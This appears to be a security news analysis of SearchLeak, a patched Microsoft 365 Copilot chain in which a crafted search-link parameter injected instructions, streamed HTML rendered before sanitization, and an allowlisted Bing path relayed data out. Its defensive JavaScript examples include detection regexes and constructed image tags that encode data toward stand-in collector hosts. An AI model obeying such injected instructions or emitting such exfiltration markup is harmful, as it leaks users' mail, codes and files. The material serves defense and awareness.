SearchLeak in Microsoft 365 Copilot: How Prompt Injection Enables Data Exfiltration

On June 15, 2026, Varonis Threat Labs disclosed SearchLeak, a patched Microsoft 365 Copilot Enterprise vulnerability chain that could let an attacker steal emails, MFA codes, calendar data, SharePoint files, OneDrive documents, and other indexed organizational content after a victim clicked a crafted Microsoft 365 Search link. The mechanics matter more than the scare headline: this was not “AI gone rogue,” but enterprise search, browser rendering, and allowlisted Microsoft infrastructure being chained into a data-exfiltration path. Microsoft has remediated the flaw, tracked by Varonis as CVE-2026-42824, but SearchLeak is the kind of bug that should make administrators rethink what it means to connect an assistant to everything a user can see. Copilot did not need to break into the tenant; it only needed to be persuaded to use the access it already had.

[Figure: Diagram of Microsoft 365 Copilot workflow showing enterprise context, searching, rendering, sanitization, and exfiltration risks.]

Copilot’s Greatest Strength Is Also Its Most Dangerous Permission Boundary

Microsoft 365 Copilot Enterprise is sold on a simple promise: it can reason over the work graph. It can summarize meetings, find documents, draft responses, answer questions about mail, and stitch together fragments from Outlook, Teams, SharePoint, OneDrive, calendars, and other indexed sources. That is exactly why organizations buy it, and exactly why a vulnerability in its search and response pipeline carries unusual weight.
Traditional enterprise software usually leaks what a particular app can reach. A mail client leaks mail, a document portal leaks documents, and a calendar bug leaks calendar entries. Copilot sits above those application silos, so an exploit against Copilot is not merely an exploit against a chatbot interface; it is an exploit against the aggregation layer Microsoft has placed over the modern workplace.
SearchLeak’s significance is not that attackers could magically read every file in a company. The attack was still constrained by the permissions of the user who clicked the link. But that is a thinner comfort than it sounds, because many organizations have spent years accumulating overexposed SharePoint sites, sprawling Teams workspaces, legacy file permissions, and mailboxes full of authentication codes, password resets, legal threads, HR material, invoices, and executive scheduling details.
In that environment, “whatever the user can access” is not a narrow boundary. It is often a quiet map of the company’s operational nervous system.

The Attack Began With a Link That Looked Like It Belonged

The first stage of SearchLeak used what Varonis calls Parameter-to-Prompt Injection, or P2P. The concept is disarmingly simple: a crafted Microsoft 365 Search URL includes attacker-controlled instructions inside a query parameter. When the victim opens the link, Copilot treats those embedded words not merely as search text, but as a prompt to execute.
That distinction is central to the problem. In old web applications, a query parameter might filter search results, prefill a box, or sort a page. In an AI-assisted interface, that same parameter can become an instruction channel. The humble q= field, long treated as a boring bit of URL plumbing, becomes a way to smuggle intent into an assistant.
The attacker does not need to compromise Microsoft credentials, install a plug-in, or persuade the user to paste text into a chatbot. The user clicks a link pointing at Microsoft’s own cloud interface. That matters because defenders have trained themselves, and their users, to be suspicious of strange domains; SearchLeak exploited the credibility of a legitimate one.
The payload Varonis demonstrated asked Copilot to search the victim’s data and embed retrieved information into an image URL. That sounds like a parlor trick until you remember that browsers and servers have spent decades treating image loads as routine, low-friction events. The attack did not need Copilot to proudly announce that it was sending secrets away. It needed Copilot to produce markup at the wrong time, and it needed the browser ecosystem to do what it normally does.

The Guardrail Failed in the Gap Between Thinking and Rendering

Microsoft’s safety model did not simply forget that generated HTML can be dangerous. According to Varonis, Copilot had a mitigation intended to wrap risky output so the browser would treat it as text rather than active markup. The failure was temporal: the wrapping reportedly happened after Copilot finished generating, while raw HTML could briefly appear in the Document Object Model during the streaming phase.
That is the sort of bug that looks small in isolation and large in context. Modern AI interfaces stream responses because users dislike staring at blank screens while a model “thinks.” The interface feels faster and more conversational when words appear incrementally. But security decisions that are safe at the end of generation may be unsafe during generation.
SearchLeak turned that timing gap into a race condition. If an injected image tag fired before the sanitizer or formatting wrapper caught up, the browser could initiate a request. Once a request has left the page, later making the text look harmless is not enough. The leak has already happened.
This is a reminder that AI safety is not only about model alignment, refusal training, or policy prompts. In production systems, the model is wrapped in web code, rendering pipelines, authentication state, caching layers, content-security policies, browser behavior, and server-side services. A safety promise made at the model layer can be undone by a millisecond of unsafe rendering.

Bing Became the Trusted Courier

The third stage of the chain abused a path through Bing’s image-search infrastructure. Microsoft 365 Copilot restricted which external image domains could be reached, a sensible control meant to prevent exactly the kind of direct exfiltration attackers want. But Bing, as a Microsoft service, was reportedly allowlisted under the relevant Content Security Policy.
Varonis says the exploit used Bing’s Search by Image behavior as a proxy. The attacker-controlled URL was not directly fetched by Copilot in the obvious way; instead, Bing’s server-side request behavior became the courier. Because the sensitive text had been placed inside the image URL, the attacker could recover it from server logs when the request arrived.
This is not an exotic lesson. Allowlists are only as safe as the behavior of the things on them. If an allowlisted service will fetch attacker-supplied URLs, transform requests, or pass along query strings containing secrets, it can become a tunnel through a policy that looks strict on paper.
The uncomfortable part for Microsoft is that this all happened inside the company’s own ecosystem. The link was Microsoft-flavored. The assistant was Microsoft’s. The search index was Microsoft 365. The bypass reportedly moved through Bing. For defenders, that collapses the easy mental model in which threats are “outside” and trusted cloud platforms are “inside.”

One Click Is the Wrong Metric, but the Right Alarm Bell

Much of the coverage of SearchLeak emphasizes that it required only one click. That is fair, because one-click attacks are easier to operationalize than attacks that require a user to approve permissions, install software, or copy and paste a malicious prompt. But “one click” can also undersell the more important issue.
The click was just the trigger. The real danger was that Copilot could be induced to perform a privileged search across business data and then participate in a rendering-and-request chain that smuggled the result outward. The human action was minimal because the machine action was expansive.
Security teams are used to asking whether a user clicked a phishing link. SearchLeak suggests a more complicated question: what did the cloud assistant do after the click, and which internal data sources did it consult on the user’s behalf? That question is harder to answer with traditional web gateway logs or endpoint telemetry.
It is also harder to train away. Users can be told not to click suspicious links, but a Microsoft 365 URL is not inherently suspicious. Long encoded query strings are not meaningful to most employees, and even technical staff are unlikely to manually decode every link that points to a familiar tenant service. The burden cannot sit primarily with the user.

This Is Prompt Injection Wearing a Suit and Badge

Prompt injection has often been discussed as a chatbot novelty: hide instructions in a web page, trick an assistant, make it ignore prior rules. SearchLeak belongs to a more mature and more troubling category. It shows prompt injection interacting with enterprise identity, browser security, server-side services, and indexed corporate data.
That is why “the AI was tricked” is an incomplete diagnosis. The model followed instructions it should not have followed, but the surrounding application made those instructions actionable. It accepted prompt material from a URL parameter. It streamed unsafe markup. It relied on sanitization that arrived too late. It trusted an allowlisted service that could be repurposed as a relay.
The exploit chain is therefore a critique of architecture, not merely behavior. The assistant is not a standalone oracle; it is a user interface for privileged actions. Once it can search, summarize, retrieve, and compose across Microsoft 365, prompt injection becomes a path to abusing business workflows.
That is the broader shift administrators need to internalize. In older systems, injection usually meant code injection, SQL injection, command injection, or cross-site scripting. In AI-integrated systems, instruction injection can be just as operationally meaningful because instructions are now part of the control plane.

Microsoft Patched the Bug, but the Pattern Will Outlive the CVE

The good news is straightforward: Microsoft has patched SearchLeak. Organizations using Microsoft 365 Copilot Enterprise should not read this as a live, unmitigated warning to panic. The responsible response is to verify remediation, review telemetry, and use the incident as a forcing function for AI-era controls.
The less comforting news is that SearchLeak follows a pattern. Varonis previously disclosed Reprompt, another single-click Copilot-related attack path in the consumer Copilot context. Separately, EchoLeak, disclosed in 2025, showed how Microsoft 365 Copilot could be vulnerable to zero-click prompt injection and data exfiltration through crafted email content. The individual bugs differ, but the trend is visible: assistants that ingest untrusted content and act over trusted data create strange new seams.
Microsoft is hardly alone here. Any vendor building enterprise AI over mail, documents, tickets, CRM records, source code, and chat history will face similar design pressure. Customers want assistants that can see more, reason more, and do more. Attackers want the same thing.
The industry’s early answer has been guardrails. SearchLeak shows why guardrails cannot be treated as a single product feature. They must exist at the prompt boundary, the data retrieval boundary, the renderer, the network egress layer, the allowlist, and the audit log. If any one layer assumes another layer has already handled the danger, chains like this become possible.

The Enterprise Search Box Has Become a Security Principal

Windows and Microsoft 365 administrators should think of Copilot less like a productivity feature and more like a new class of security principal. It does not have independent human intent, but it can exercise delegated access, query sensitive repositories, and transform retrieved data into new outputs. That combination deserves the same suspicion normally reserved for automation accounts and privileged service identities.
The fact that Copilot operates “as the user” is both a design strength and a governance trap. It avoids handing the assistant a universal skeleton key, but it also inherits every messy permission decision the organization has ever made. If a user has access to 10 years of overshared project folders, Copilot may be able to find and summarize that material faster than the user ever could.
That changes the risk equation for stale permissions. Before AI search, excessive access often hid behind inconvenience. A user might technically be able to browse an old SharePoint hierarchy, but finding the damaging file could take time. Copilot reduces that friction, which means latent permission problems become active exposure problems.
This is where SearchLeak should push IT teams beyond patch management. The patch closes this chain. It does not clean up the data estate Copilot can search. It does not decide whether MFA codes should remain in email. It does not classify sensitive documents or remove abandoned access grants. Those are tenant governance problems, and AI makes them less ignorable.

The Detection Problem Is Not Just Malware Without Malware

SearchLeak is unnerving because it does not resemble the kind of intrusion many tools are optimized to catch. There is no payload dropped on disk. There is no obvious malware beacon. There may be no suspicious login from a foreign IP address. The user interacts with a legitimate Microsoft cloud service, and Microsoft cloud services talk to each other.
That does not make detection impossible, but it does make it different. Security teams need visibility into anomalous Copilot search behavior, unusual query parameters, suspiciously encoded prompts, unexpected HTML-like output patterns, and egress paths that move through trusted services. They also need to understand what logs Microsoft exposes for Copilot interactions and whether those logs are detailed enough to reconstruct misuse.
The hardest cases are the ones that look like productivity. A real user might ask Copilot to find an invoice, summarize a thread, or locate a meeting note. A malicious prompt may ask for similar retrieval, then encode the result into a request. The difference is not merely the data accessed, but the intent and the output channel.
This is why AI security will increasingly overlap with data security. If organizations cannot answer who has access to what, where sensitive material lives, and how often it is retrieved, they will struggle to distinguish legitimate Copilot use from abuse. Model-level monitoring is necessary, but it is not sufficient.
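
One way to triage proxy or gateway logs for the query-parameter pattern described above, as an added example that is not from Varonis or Microsoft. The host name, thresholds, keyword lists and log lines are constructed assumptions, and the regular expressions are heuristics rather than a published detection rule.

```javascript
// Added example: hypothetical triage of logged search URLs. The host below is
// a placeholder; substitute the search hosts observed in your own tenant.
const SEARCH_HOSTS = new Set(["m365-search.example.invalid"]);
const MARKUP = /<\s*[a-z][^>]*>|\bsrc\s*=/i;
const EMBEDDED_URL = /https?:\/\/[^\s"'<>]+/i;
const INSTRUCTION = new RegExp(
  "\\b(find|search|summari[sz]e|list|include|embed)\\b[^.]*" +
  "\\b(e-?mails?|files?|codes?|calendar|documents?)\\b", "i");

// Undo up to three extra layers of percent-encoding left after URL parsing.
function peelEncoding(value) {
  let layers = 0;
  while (layers < 3 && /%[0-9a-f]{2}/i.test(value)) {
    let next;
    try { next = decodeURIComponent(value); } catch { break; }
    if (next === value) break;
    value = next;
    layers += 1;
  }
  return { value, layers };
}

// Returns null for URLs that are not search requests, else the decoded query
// and the reasons it looks unusual. Two or more reasons flag the URL.
function triageSearchUrl(rawUrl) {
  let url;
  try { url = new URL(rawUrl); } catch { return null; }
  if (!SEARCH_HOSTS.has(url.hostname)) return null;
  const q = url.searchParams.get("q"); // searchParams decodes one layer
  if (q === null) return null;
  const { value, layers } = peelEncoding(q);
  const reasons = [];
  if (rawUrl.length > 300) reasons.push("long-url"); // assumed threshold
  if (layers > 0) reasons.push("nested-encoding");
  if (MARKUP.test(value)) reasons.push("markup");
  if (EMBEDDED_URL.test(value)) reasons.push("embedded-url");
  if (INSTRUCTION.test(value)) reasons.push("instruction-like");
  return { query: value, reasons, flagged: reasons.length >= 2 };
}

// Constructed log lines: a plain query, a natural-language query that only
// looks instruction-like, a double-encoded query carrying markup and a URL,
// and a request to a host that is out of scope.
const BASE = "https://m365-search.example.invalid/search?q=";
const CONSTRUCTED_LOG = [
  BASE + "quarterly+budget+2026",
  BASE + encodeURIComponent("find emails about the Q3 invoice"),
  BASE + encodeURIComponent(encodeURIComponent(
    "PLACEHOLDER-INSTRUCTION-TEXT <img src=https://collector.example.invalid/p?d=PLACEHOLDER>")),
  "https://intranet.example.invalid/?q=%3Cimg%20src%3Dx%3E",
];

function flaggedUrls(lines) {
  return lines.filter((u) => triageSearchUrl(u)?.flagged);
}
```

The second log line shows why a single signal is not enough: an ordinary request to find mail matches the instruction heuristic on its own and stays unflagged.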

The Browser Is Still Part of the Attack Surface

SearchLeak also punctures the illusion that AI security is somehow separate from ordinary web security. The chain depended on an HTML rendering race condition and a Content Security Policy bypass. Those are not futuristic concerns. They are familiar web application security problems, reframed by an AI interface that generated the content being rendered.
That should make developers cautious about treating model output as text simply because it originated in a chat response. If the response can contain markup, links, media references, or embedded resources, it belongs in the same threat model as untrusted user-generated content. Sanitization must happen before rendering, not after a polished answer is assembled.
Streaming complicates this. The product pressure to stream model output is real, and in most cases users prefer it. But every streamed token that reaches a browser before validation is a potential policy decision made too early. The interface needs to be safe during generation, not merely safe after generation.
For admins, the practical lesson is that vendor claims about AI safety should be interrogated at the application layer. Ask how output is rendered. Ask what domains are allowlisted and why. Ask whether the assistant can initiate external fetches, directly or indirectly. Ask whether generated links and media are treated as inert text until proven safe.
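
The timing gap between streaming and sanitization, shown with a toy renderer as an added example (not Copilot's code). `FakeDom` is a hypothetical stand-in that issues a request as soon as a complete image tag is parsed, and the chunked stream and relay host are constructed.

```javascript
// Toy "browser": parsing HTML that contains a complete <img src=...> tag
// starts a request for that URL, and a started request cannot be recalled.
class FakeDom {
  constructor() { this.html = ""; this.requests = []; }
  setHtml(html) {
    this.html = html;
    const tag = /<img\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)[^>]*>/gi;
    for (const m of html.matchAll(tag)) {
      if (!this.requests.includes(m[1])) this.requests.push(m[1]);
    }
  }
}

const escapeHtml = (s) => s.replace(/[&<>"']/g, (c) => ({
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
}[c]));

// Pattern the article describes: raw chunks reach the DOM while streaming and
// the neutralizing wrapper is applied only after generation has finished.
function renderUnsafe(chunks) {
  const dom = new FakeDom();
  let raw = "";
  for (const chunk of chunks) {
    raw += chunk;
    dom.setHtml(raw); // markup is live during streaming
  }
  dom.setHtml("<pre>" + escapeHtml(raw) + "</pre>"); // too late
  return dom;
}

// Hardened: every chunk is escaped before it is appended, so no intermediate
// state ever contains a tag. Per-character escaping is stateless, which means
// a tag split across chunk boundaries cannot slip through. In a real page the
// equivalent is appending text nodes or textContent, never innerHTML.
function renderSafe(chunks) {
  const dom = new FakeDom();
  let safe = "";
  for (const chunk of chunks) {
    safe += escapeHtml(chunk);
    dom.setHtml("<pre>" + safe + "</pre>");
  }
  return dom;
}

// Constructed stream with the tag split across chunk boundaries.
const SAMPLE_CHUNKS = [
  "Here is the summary. <im",
  'g src="https://relay.example.invalid/i?d=CONSTRUCTED',
  '-VALUE"',
  "> Done.",
];
```

Both renderers end with the same harmless-looking text on screen; only the request log of the first one shows that the image URL was already fetched.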

The Old Advice Still Helps, but It No Longer Fits the Whole Threat

There is a temptation after every link-triggered exploit to fall back on user awareness training. Do not click strange links. Inspect URLs. Report unusual behavior. Those are still useful habits, and Varonis’ own defensive guidance includes watching for suspicious Microsoft 365 Search URLs with encoded payloads in the query parameter.
But SearchLeak demonstrates the limits of awareness-first security. A link to Microsoft 365 is not enough to set off alarm bells. A long query string is not readable to most employees. And if the attack succeeds through a legitimate enterprise assistant, the user may not see a conventional warning sign at all.
The better response is layered. Administrators should verify Microsoft’s remediation, monitor for suspicious Copilot Search usage, review content-security assumptions, reduce oversharing in Microsoft 365, and treat AI assistants as high-value interfaces that deserve dedicated logging and policy controls. Security vendors, meanwhile, need to stop treating AI activity as an odd corner of SaaS monitoring and start treating it as a primary channel for data movement.
Users still matter, but they should not be the final safety mechanism for an architecture that can search an organization on their behalf.

SearchLeak Turns AI Governance From Policy Talk Into Patch Tuesday Reality

The immediate lesson from SearchLeak is narrow enough to act on, but broad enough to change roadmaps. This was a patched vulnerability chain in Microsoft 365 Copilot Enterprise Search, not a reason to ban every assistant or declare enterprise AI unusable. It is, however, a strong argument that AI rollout plans must be tied to data hygiene, logging, and application security rather than handled as a licensing and adoption exercise.
  • Organizations using Microsoft 365 Copilot Enterprise should confirm that Microsoft’s remediation for SearchLeak has been applied and review whether any compensating controls are needed.
  • Security teams should monitor Microsoft 365 Search URLs for unusually long or encoded q parameters that appear to contain instructions, markup, or data-exfiltration patterns.
  • Administrators should audit overshared SharePoint, OneDrive, Teams, and mailbox content because Copilot can make excessive access easier to exploit.
  • Developers building AI interfaces should treat streamed model output as untrusted until it has been sanitized before rendering, not after generation completes.
  • Defenders should review allowlisted services that can fetch attacker-controlled URLs, because trusted infrastructure can become an exfiltration relay.
  • Enterprises should assume future AI vulnerabilities will be chains, not single bugs, and should test controls across identity, retrieval, rendering, and network egress together.
SearchLeak will fade as a specific CVE, but the architecture it exposed is becoming normal: assistants with broad delegated access, natural-language control surfaces, streamed web output, and tight integration with trusted cloud services. The next serious Copilot-class incident may not use the same query parameter, the same race condition, or the same Bing relay, but it will probably exploit the same bargain enterprises are making with AI: give the assistant more context, let it act faster, and hope the guardrails are as integrated as the product pitch.

References

  1. Primary source: Mashable
    Published: Tue, 16 Jun 2026 20:32:19 GMT
  2. Related coverage: varonis.com
  3. Related coverage: windowscentral.com
  4. Related coverage: techrepublic.com
  5. Related coverage: venturebeat.com
  6. Related coverage: techradar.com
  7. Related coverage: thenextweb.com
  8. Related coverage: utopiats.com
  9. Related coverage: tomsguide.com
  10. Related coverage: labs.cloudsecurityalliance.org